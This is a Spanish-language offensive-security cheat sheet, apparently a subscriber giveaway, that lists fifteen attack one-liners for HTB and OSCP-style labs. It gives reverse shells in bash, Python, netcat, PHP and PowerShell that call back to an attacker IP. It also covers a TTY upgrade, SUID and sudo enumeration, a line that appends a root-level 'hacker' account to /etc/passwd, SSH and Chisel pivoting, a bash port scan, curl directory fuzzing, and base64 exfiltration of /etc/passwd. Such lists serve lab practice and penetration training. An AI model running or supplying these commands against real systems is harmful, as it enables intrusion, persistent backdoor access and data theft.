โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
   GOLD ONE-LINERS - TOP 15 COMANDOS QUE Sร USARรS
   Pack 1000 Subs | @3diklab
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

โ๏ธ  USO รTICO รNICAMENTE - LAB AUTORIZADO / HTB / OSCP
    Uso no autorizado es ILEGAL y puede resultar en cargos criminales.

โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ด REVERSE SHELLS - LOS 5 QUE SIEMPRE FUNCIONAN
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

[1] BASH - El clรกsico infalible
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

[2] PYTHON - Upgrade a TTY interactivo
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

[3] NETCAT - Cuando bash estรก restringido
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.5 4444 >/tmp/f

[4] PHP - Para web shells
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/bash -i <&3 >&3 2>&3");'

[5] POWERSHELL - Windows reverse shell (one-liner)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โก TTY UPGRADE - Conseguir shell interactiva
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

[6] Upgrade completo (ejecutar en orden):
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z (background)
stty raw -echo; fg
# Enter x2
export TERM=xterm
export SHELL=bash


โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ PRIVESC - Descubrir el camino a root
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

[7] SUID binaries - El oro de PrivEsc
find / -perm -4000 -type f 2>/dev/null

[8] SUDO misconfiguration - Quรฉ puedo ejecutar
sudo -l

[9] CAPABILITIES - El PrivEsc olvidado
getcap -r / 2>/dev/null

[10] Writable /etc/passwd - Game over
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash' >> /etc/passwd
# Password: hacker123


โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ NETWORK PIVOTING - Movimiento lateral
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

[11] SSH Local Port Forwarding - Acceder a puerto interno
ssh -L 8080:localhost:80 user@10.10.10.5

[12] SSH Dynamic Port Forwarding - SOCKS proxy
ssh -D 9050 user@10.10.10.5
# Luego usa: proxychains nmap ...

[13] Chisel - Tunneling sin SSH
# Attacker: ./chisel server -p 8000 --reverse
# Victim:   ./chisel client 10.10.14.5:8000 R:8080:127.0.0.1:80


โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ RECONOCIMIENTO - Escaneo sin nmap
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

[14] Port scan con Bash puro (post-exploitation sin tools)
for PORT in {1..1000}; do timeout 1 bash -c "</dev/tcp/172.17.0.1/$PORT" &>/dev/null && echo "Puerto $PORT abierto"; done

[15] Web fuzzing bรกsico con curl
for DIR in admin login backup config uploads; do curl -s -o /dev/null -w "%{http_code} - $DIR\n" http://10.10.10.5/$DIR/; done


โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ก TIPS RรPIDOS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

โข Listener en attacker machine: nc -lvnp 4444
โข Transferir archivos HTTP: python3 -m http.server 8000
โข Transferir con netcat: nc -lvnp 4444 > archivo (receiver) | nc IP 4444 < archivo (sender)
โข Base64 exfiltration: cat /etc/passwd | base64 -w0
โข Buscar passwords: grep -ri "password" /var/www/html 2>/dev/null

โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ RECURSOS
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ

GTFOBins     โ https://gtfobins.github.io/
RevShells    โ https://www.revshells.com/
PayloadsAll  โ https://github.com/swisskyrepo/PayloadsAllTheThings
HackTricks   โ https://book.hacktricks.xyz/

โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ถ๏ธ @3diklab | Pack 1000 Subs | Uso รtico รnicamente
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
